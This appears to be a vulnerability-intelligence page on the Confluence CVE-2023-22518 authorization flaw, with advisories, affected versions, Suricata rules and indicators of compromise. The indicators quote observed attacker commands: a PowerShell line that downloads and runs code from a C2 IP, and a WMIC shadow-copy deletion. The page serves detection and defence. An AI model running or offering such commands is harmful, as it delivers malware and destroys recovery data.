CVE-2023-22518
published 2023-10-31CVE-2023-22518: All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2023-11-28
Exploited in the wild
EPSS
100.00%
100.0th percentile
All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability.
Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atlassian | confluence_data_center | — | — |
| atlassian | confluence_data_center | — | — |
| atlassian | confluence_data_center | — | — |
| atlassian | confluence_data_center | >= 1.0 < 7.19.16 | 7.19.16 |
| atlassian | confluence_data_center | >= 7.20.0 < 8.3.4 | 8.3.4 |
| atlassian | confluence_data_center | >= 8.4.0 < 8.4.4 | 8.4.4 |
| atlassian | confluence_data_center | >= 8.5.0 < 8.5.3 | 8.5.3 |
| atlassian | confluence_server | — | — |
| atlassian | confluence_server | — | — |
| atlassian | confluence_server | >= 1.0 < 7.19.16 | 7.19.16 |
| atlassian | confluence_server | >= 7.20.0 < 8.3.4 | 8.3.4 |
| atlassian | confluence_server | >= 8.4.0 < 8.4.4 | 8.4.4 |
| atlassian | confluence_server | >= 8.5.0 < 8.5.3 | 8.5.3 |
Detection & IOCsextracted from sources · hover to see the quote
commandpowershell.exe -exec bypass -nop -enc IEX((New-Object Net.WebClient).DownloadString(hxxp://193.176[.]179[.]41/tmp.37))↗
commandcmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{xxxx392B-3896-49EE-8B43-0233022xxxxx}'" delete↗
- →Detect exploitation attempts by monitoring POST requests to the Confluence setup-restore endpoints: /json/setup-restore.action, /json/setup-restore-local.action, and /json/setup-restore-progress.action from unauthenticated sources. ↗
- →Hunt for the Shodan favicon hash -305179312 to identify exposed Confluence instances potentially targeted in this campaign. ↗
- →Alert on Java (Confluence parent process) spawning shell commands or PowerShell, which indicates post-exploitation command injection via CVE-2023-22518. ↗
- →Detect presence of the malicious Confluence plugin artifact 'web.shell.Plugin' as an indicator of a successful web shell installation post-exploitation. ↗
- →Detect WMIC shadow copy deletion commands executed via cmd.exe as a post-ransomware-deployment indicator to prevent recovery. ↗
- →Monitor for outbound connections from Confluence servers to 45.145.6.112, 193.43.72.11, 193.176.179.41, and 193.187.172.73, which are confirmed C2/payload delivery IPs for C3RB3R ransomware campaigns exploiting CVE-2023-22518. ↗
- →Detect the base64-encoded shell dropper command pattern used in Linux post-exploitation: piping base64-decoded content directly into sh or python interpreters from the Confluence Java process. ↗
- →Lateral movement indicator: monitor for SMB connections on port 445 originating from Confluence servers, as the ransomware attempts to spread over SMB/445. ↗
- ·Atlassian Cloud (atlassian.net) instances are NOT affected by CVE-2023-22518; only self-hosted Confluence Data Center and Server deployments are vulnerable. ↗
- ·The CVSS score was escalated from 9.1 to the maximum 10.0 on November 6, 2023, after active ransomware exploitation was confirmed, changing the scope assessment of the vulnerability. ↗
- ·Temporary mitigation (if patching is not immediately feasible) requires blocking external network access to the three setup-restore endpoints; simply restricting internet access to the Confluence instance is also recommended until patching is complete. ↗
- ·The new C3RB3R Cerber variant differs from older Cerber samples: ransom note changed from HTML (__$$RECOVERYREDME$$.html) to plain text (read-me3.txt) and encrypted file extension changed from '.locked' to '.L0CK3D'; detection rules targeting old Cerber artifacts may miss this variant. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.010.0CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8prx-84h6-4fr5: All versions of Confluence Data Center and Server are affected by this unexploited vulnerability
ghsa_unreviewed·2023-10-31
CVE-2023-22518 [CRITICAL] CWE-863 GHSA-8prx-84h6-4fr5: All versions of Confluence Data Center and Server are affected by this unexploited vulnerability
All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.
Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
VulnCheck
Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
vulncheck·2023·CVSS 9.8
CVE-2023-22518 [CRITICAL] CWE-863 Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
Atlassian Confluence Data Center and Server contain an improper authorization vulnerability that can result in significant data loss when exploited by an unauthenticated attacker. There is no impact on confidentiality since the attacker cannot exfiltrate any data.
Affected: Atlassian Confluence Server and Data Center
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2023-22518; https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-confluence-serve
CISA
Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
cisa·2023-11-07·CVSS 9.8
CVE-2023-22518 [CRITICAL] CWE-863 Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
Vulnerability: Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
Affected: Atlassian Confluence Data Center and Server
Atlassian Confluence Data Center and Server contain an improper authorization vulnerability that can result in significant data loss when exploited by an unauthenticated attacker. There is no impact on confidentiality since the attacker cannot exfiltrate any data.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html; https://nvd.nist.gov/vuln/detail/CVE-2023-22518
Remediation Due Date: 2023-11-28
Atlassian
CVE-2023-22518 - Improper Authorization Vulnerability in Confluence Data Center and Server
vendor_atlassian·CVSS 9.8
CVE-2023-22518 [CRITICAL] CVE-2023-22518 - Improper Authorization Vulnerability in Confluence Data Center and Server
CVE-2023-22518 - Improper Authorization Vulnerability in Confluence Data Center and Server
CVE-2023-22518 - Improper Authorization Vulnerability in Confluence Data Center and Server
CVE: CVE-2023-22518
Affected products: Confluence Data Center
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22522 Vulnerable Server Detected M1 Version 4.x-7.x
suricata·2023-12-08·CVSS 8.8
CVE-2023-22522 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22522 Vulnerable Server Detected M1 Version 4.x-7.x
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22522 Vulnerable Server Detected M1 Version 4.x-7.x
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22522 Vulnerable Server Detected M1 Version 4.x-7.x"; flow:established,to_client; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|"; fast_pattern; pcre:"/^[4-7]\./R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html; reference:cve,2023-22522; classtype:web-application-activity; sid:2049623; rev:1; metadata:affected_product Atlassian_Confluence, attack_target Web_Serv
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 7.x M1
suricata·2023-11-06·CVSS 9.8
CVE-2023-22518 [CRITICAL] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 7.x M1
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 7.x M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 7.x M1"; flow:established,to_client; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|7|2e|"; fast_pattern; pcre:"/^(?:1(?:9(?:\.(?:[023456789]|1[012345]?))?|3(?:\.(?:[03456789]|1\d?|20?))?|1(?:\.[0123456])?|2(?:\.[012345])?|6(?:\.[012345])?|7(?:\.[012345])?|4(?:\.[01234])?|5(?:\.[0123])?|8(?:\.[0123])?|0(?:\.[012])?|\.[012])?|4(?:\.(?:[023456789]|1[012345678]?))?|2(?:0(?:\.[0123])?|\.[012])?|0(?:\.[012345])?|3(?:\.[012345])?|7(?:\.[01234])?|8(?:\.[0123])?|9(?:\.[0123])?|5(?:\.[012])?|6(?:\.
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected M1 Version 1.x-6.x
suricata·2023-11-06·CVSS 9.8
CVE-2023-22518 [CRITICAL] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected M1 Version 1.x-6.x
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected M1 Version 1.x-6.x
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected M1 Version 1.x-6.x"; flow:established,to_client; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|"; fast_pattern; pcre:"/^[1-6]\./R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html; reference:cve,2023-22518; classtype:web-application-activity; sid:2049080; rev:1; metadata:affected_product Atlassian_Confluence, attack_target Web_Serv
Suricata
ET EXPLOIT Possible Atlassian Confluence Improper Authentication Validation Exploitation Attempt set (CVE-2023-22518)
suricata·2023-11-06·CVSS 9.8
CVE-2023-22518 [CRITICAL] ET EXPLOIT Possible Atlassian Confluence Improper Authentication Validation Exploitation Attempt set (CVE-2023-22518)
ET EXPLOIT Possible Atlassian Confluence Improper Authentication Validation Exploitation Attempt set (CVE-2023-22518)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Atlassian Confluence Improper Authentication Validation Exploitation Attempt set (CVE-2023-22518)"; flow:established,to_server; flowbits:set,ET.CVE-2023-22518.req; flowbits:noalert; http.method; content:"POST"; http.uri; content:"/json/setup-restore"; fast_pattern; content:".action"; within:20; http.header; header_lowercase; content:"x-atlassian-token|3a 20|no-check|0d|"; http.request_body; content:"filename=|22|"; pcre:"/^[^\x22]+\.zip\x22/Ri"; content:"Upload|20|and|20|import|0d 0a|"; nocase; reference:cve,2023-22518; classtype:attempted-admin; sid:2049096; rev:3; metadata:affected_produc
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 7.x M2
suricata·2023-11-06·CVSS 9.8
CVE-2023-22518 [CRITICAL] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 7.x M2
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 7.x M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 7.x M2"; flow:established,to_client; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|7|2e|"; fast_pattern; pcre:"/^(?:1(?:9(?:\.(?:[023456789]|1[012345]?))?|3(?:\.(?:[03456789]|1\d?|20?))?|1(?:\.[0123456])?|2(?:\.[012345])?|6(?:\.[012345])?|7(?:\.[012345])?|4(?:\.[01234])?|5(?:\.[0123])?|8(?:\.[0123])?|0(?:\.[012])?|\.[012])?|4(?:\.(?:[023456789]|1[012345678]?))?|2(?:0(?:\.[0123])?|\.[012])?|0(?:\.[012345])?|3(?:\.[012345])?|7(?:\.[01234])?|8(?:\.[0123])?|9(?:\.[0123])?|5(
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2
suricata·2023-11-06·CVSS 9.8
CVE-2023-22518 [CRITICAL] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2"; flow:established,to_client; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|8|2e|"; fast_pattern; pcre:"/^(?:1(?:\.[01234])?|0(?:\.[1234])?|2(?:\.[0123])?|3(?:\.[0123])?|4(?:\.[0123])?|5(?:\.[012])?|6(?:\.0)?)\x3c/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html; reference:cve,2023-22518; classtype:w
Suricata
ET EXPLOIT Successful Atlassian Confluence Improper Authentication Validation Exploitation Attempt (CVE-2023-22518)
suricata·2023-11-06·CVSS 9.8
CVE-2023-22518 [CRITICAL] ET EXPLOIT Successful Atlassian Confluence Improper Authentication Validation Exploitation Attempt (CVE-2023-22518)
ET EXPLOIT Successful Atlassian Confluence Improper Authentication Validation Exploitation Attempt (CVE-2023-22518)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Successful Atlassian Confluence Improper Authentication Validation Exploitation Attempt (CVE-2023-22518)"; flow:established,to_client; flowbits:isset,ET.CVE-2023-22518.req; http.stat_code; content:"200"; http.response_body; content:"The|20|zip|20|file|20|did|20|not|20|contain|20|an|20|entry"; fast_pattern; nocase; reference:cve,2023-22518; classtype:attempted-admin; sid:2049097; rev:2; metadata:affected_product Atlassian_Confluence, attack_target Server, created_at 2023_11_06, cve CVE_2023_22518, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag C
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1
suricata·2023-11-06·CVSS 9.8
CVE-2023-22518 [CRITICAL] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1"; flow:established,to_client; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|8|2e|"; fast_pattern; pcre:"/^(?:1(?:\.[01234])?|0(?:\.[1234])?|2(?:\.[0123])?|3(?:\.[0123])?|4(?:\.[0123])?|5(?:\.[012])?|6(?:\.0)?)\x22/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html; reference:cve,2023-22518; classtype:web-application-act
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected M2 Version 1.x-6.x
suricata·2023-11-06·CVSS 9.8
CVE-2023-22518 [CRITICAL] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected M2 Version 1.x-6.x
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected M2 Version 1.x-6.x
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected M2 Version 1.x-6.x"; flow:established,to_client; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|"; fast_pattern; pcre:"/^[1-6]\./R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html; reference:cve,2023-22518; classtype:web-application-activity; sid:2049081; rev:1; metadata:affected_product Atlassian_Confluence, atta
Metasploit
Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)
metasploit·CVSS 9.8
CVE-2023-22518 [CRITICAL] Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)
Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator. This module uses the administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code execution on the target in the context of the of the user running the confluence server.
Nuclei
Atlassian Confluence Server - Improper Authorization
nuclei·CVSS 9.8
CVE-2023-22518 [CRITICAL] Atlassian Confluence Server - Improper Authorization
Atlassian Confluence Server - Improper Authorization
All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.
Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Template:
id: CVE-2023-22518
info:
name: Atlassian Confluence Server - Improper Authorization
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.
Atlassian
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Unit42
Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
blogs_unit42·2025-12-12·CVSS 10.0
CVE-2025-55182 [CRITICAL] Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
Threat Research Center
High Profile Threats
Vulnerabilities
## Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
Justin Moore
Published: December 12, 2025
High Profile Threats
Vulnerabilities
Cobalt Strike
CVE-2025-55182
CVE-2025-66478
Remote Code Execution
Web shells
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Jan. 30, 2025. Please refer to Vercel's website for the latest information.
## Update Dec. 12, 2025
Unit 42 uncovered the previously unseen KSwapDoor. This Linux backdoor was initially mistaken for BPFDoor.
Key features include:
P2P mesh network: Enables multi-hop routing for robust C2 communications
Strong encryption: Uses AES-256-CFB with Diffie-Hellman key exchange
Stealth an
Unit42
Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
blogs_unit42·2025-12-12·CVSS 10.0
CVE-2025-55182 [CRITICAL] Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Jan. 30, 2025. Please refer to Vercel's website for the latest information.
### Update Dec. 12, 2025
Unit 42 uncovered the previously unseen KSwapDoor. This Linux backdoor was initially mistaken for BPFDoor.
Key features include:
- P2P mesh network: Enables multi-hop routing for robust C2 communications
- Strong encryption: Uses AES-256-CFB with Diffie-Hellman key exchange
- Stealth and persistence: Mimics a legitimate Linux kernel swap daemon
- Full remote access: Offers an interactive shell, command execution, file operations and lateral movement scanning
### Update Dec. 9, 2025
Unit 42 has identified activity that reportedly shares overlap with North Korean (DPRK) Contagious Interview tooling, t
Dfir Report
Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware
blogs_dfir_report·2025-05-19·CVSS 9.8
[CRITICAL] Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware
From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion Read More
- dragonforce Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs Read More
Services Overview
Threat Hunting
-
Integration
CTI Program Advisory
Incident Response Playbook
About us
Contact Us
Collaboration
Careers
Analysts
Access DFIR Labs
Get in Touch
Public Reports
Products Overview
Threat intel Overview
Threat Feed
Private DFIR Reports
All Intel
Active Defense
DFIR Labs
Case Artifacts
Detection Pack
AI Training Ground
Service Overview
Threat Hunting
Integration
CTI Program Advisory
Incident Response Playbook
Company Overview
About us
Contact Us
Careers
Analyst
SQL Brute Force Leads to BlueSky Ransomware
From OneNote to RansomNote: An Ice Col
Dfir Report
Confluence Exploit Leads to LockBit Ransomware
blogs_dfir_report·2025-02-24·CVSS 9.8
[CRITICAL] Confluence Exploit Leads to LockBit Ransomware
From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion Read More
- dragonforce Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs Read More
Services Overview
Threat Hunting
-
Integration
CTI Program Advisory
Incident Response Playbook
About us
Contact Us
Collaboration
Careers
Analysts
Access DFIR Labs
Get in Touch
Public Reports
Products Overview
Threat intel Overview
Threat Feed
Private DFIR Reports
All Intel
Active Defense
DFIR Labs
Case Artifacts
Detection Pack
AI Training Ground
Service Overview
Threat Hunting
Integration
CTI Program Advisory
Incident Response Playbook
Company Overview
About us
Contact Us
Careers
Analyst
SQL Brute Force Leads to BlueSky Ransomware
From OneNote to RansomNote: An Ice Col
Tenable
Cybersecurity Snapshot: Data Breach Costs Rise, as Ransomware Attacks Fall, Reports Find
blogs_tenable·2024-08-02
Cybersecurity Snapshot: Data Breach Costs Rise, as Ransomware Attacks Fall, Reports Find
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Bericht 2023: die E-Mail-Bedrohungslandschaft wächst
blogs_trendmicro·2024-05-28
Bericht 2023: die E-Mail-Bedrohungslandschaft wächst
Malware
## Bericht 2023: die E-Mail-Bedrohungslandschaft wächst
Mail als die beliebteste Internet-Aktivität ist daher auch der bevorzugte Angriffsvektor. Unser Jahresbericht dokumentiert einen massiven Angriffsanstieg, aufgrund Verwendung von Phishing-Links in Mail-Anhängen, aber auch mehr BEC-Betrug.
By: Trend Micro May 28, 2024 Read time: ( words)
Save to Folio
2023 entdeckten und blockierten wir insgesamt 19,1 Millionen Malware-Dateien, ein deutlicher Anstieg von 349 % gegenüber dem Vorjahr. Bei den bekannten Malware-Dateien mit 16 Millionen Erkennungen belief sich der Anstieg auf 3.079 %. Dieser erhebliche Zuwachs bei der Erkennung ist auf die verstärkte Verwendung von Phishing-Links in Mail-Anhängen zurückzuführen. Dieser Trend zeigt, dass böswillige Akteure Angriffe mit immer au
Qualys
Combine Qualys TruRisk™ and MITRE ATT&CK to Adopt Threat-Informed Defense to Reduce Risk
blogs_qualys·2024-03-25
Combine Qualys TruRisk™ and MITRE ATT&CK to Adopt Threat-Informed Defense to Reduce Risk
## Table of Contents
Announcing MITRE ATT&CK Matrix Prioritization in Qualys VMDR
MITRE ATT&CK Framework
Top MITRE ATT&CK Tactics and Techniques Leveraged
How to Combine Qualys TruRisk and MITRE ATT&CK to Reduce Your Cyber Risk
Using the MITRE ATT&CK Matrix for Prioritization
Remediation Strategies
Conclusion
Contributors
There are so many vulnerabilities disclosed daily that no one can patch all of them. Unfortunately, attackers can exploit them while you are still in the process of reviewing, prioritizing, and patching. Effective risk-based prioritization focuses your limited resources and remediation efforts where you will have the greatest impact in reducing risk and safeguarding your assets.
While CVSS and EPSS are foundational metrics for risk severity, they can miss real t
Qualys
Combine Qualys TruRisk™ and MITRE ATT&CK to Adopt Threat-Informed Defense to Reduce Risk | Qualys
blogs_qualys·2024-03-25
Combine Qualys TruRisk™ and MITRE ATT&CK to Adopt Threat-Informed Defense to Reduce Risk | Qualys
#### Table of Contents
- Announcing MITRE ATT&CK Matrix Prioritization in Qualys VMDR
- MITRE ATT&CK Framework
- Top MITRE ATT&CK Tactics and Techniques Leveraged
- How to Combine Qualys TruRisk and MITRE ATT&CK to Reduce Your Cyber Risk
- Using the MITRE ATT&CK Matrix for Prioritization
- Remediation Strategies
- Conclusion
- Contributors
There are so many vulnerabilities disclosed daily that no one can patch all of them. Unfortunately, attackers can exploit them while you are still in the process of reviewing, prioritizing, and patching. Effective risk-based prioritization focuses your limited resources and remediation efforts where you will have the greatest impact in reducing risk and safeguarding your assets.
While CVSS and EPSS are foundational metrics for risk severity, they can
Tenable
CVE-2023-22527: Atlassian Confluence Data Center and Server Template Injection Exploited in the Wild
blogs_tenable·2024-01-23·CVSS 9.8
[CRITICAL] CVE-2023-22527: Atlassian Confluence Data Center and Server Template Injection Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Wiz
Crying Out Cloud - December Newsletter | Wiz
blogs_wiz·2023-12-01·CVSS 8.8
CVE-2022-4886 [HIGH] Crying Out Cloud - December Newsletter | Wiz
This month introduced vulnerabilities and security incidents that have left users affected. We've curated the most interesting and impactful security highlights for you from the month of November.
Here are our top picks of cloud security highlights!
## 🐞 High Profile Vulnerabilities
High severity vulnerabilities in NGINX Ingress Controller
NGINX ingress controller is affected by 3 high severity vulnerabilities. CVE-2022-4886 allows an attacker who can control the Ingress object itself to steal Kubernetes API credentials, while CVE-2023-5043 and CVE-2023-5044 enable an attacker who can control configuration of the Ingress object to inject arbitrary code and steal credentials from the cluster. As of November 1, 2023, there is no fixed version available. Therefore, users are advised to up
Sentinelone
Cerber
blogs_sentinelone·2023-11-17
Cerber
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Sentinelone
C3RB3R Ransomware | Ongoing Exploitation of CVE-2023-22518 Targets Unpatched Confluence Servers
blogs_sentinelone·2023-11-14·CVSS 9.8
CVE-2023-22518 [CRITICAL] C3RB3R Ransomware | Ongoing Exploitation of CVE-2023-22518 Targets Unpatched Confluence Servers
SentinelOne is currently monitoring increased exploitation of CVE-2023-22518 , a recently identified vulnerability in Atlassian’s Confluence Datacenter and Server software. We have observed multiple campaigns leveraging the bug to deploy new C3RB3R ( Cerber ) ransomware variants targeting both Windows and Linux hosts.
In this post, we detail the attack chain observed in these incidents and provide recent indicators to help responders and threat hunters identify and mitigate similar attacks in these ongoing campaigns .
## Background
CVE-2023-22518 is an improper authorization vulnerability of all versions of Atlassian’s Confluence Data Center and Server which allows for an unauthenticated remote attacker to create a backdoor administrator account for an exposed Confluence instance. The r
Sentinelone
C3RB3R Ransomware | Ongoing Exploitation of CVE-2023-22518 Targets Unpatched Confluence Servers
blogs_sentinelone·2023-11-14·CVSS 9.8
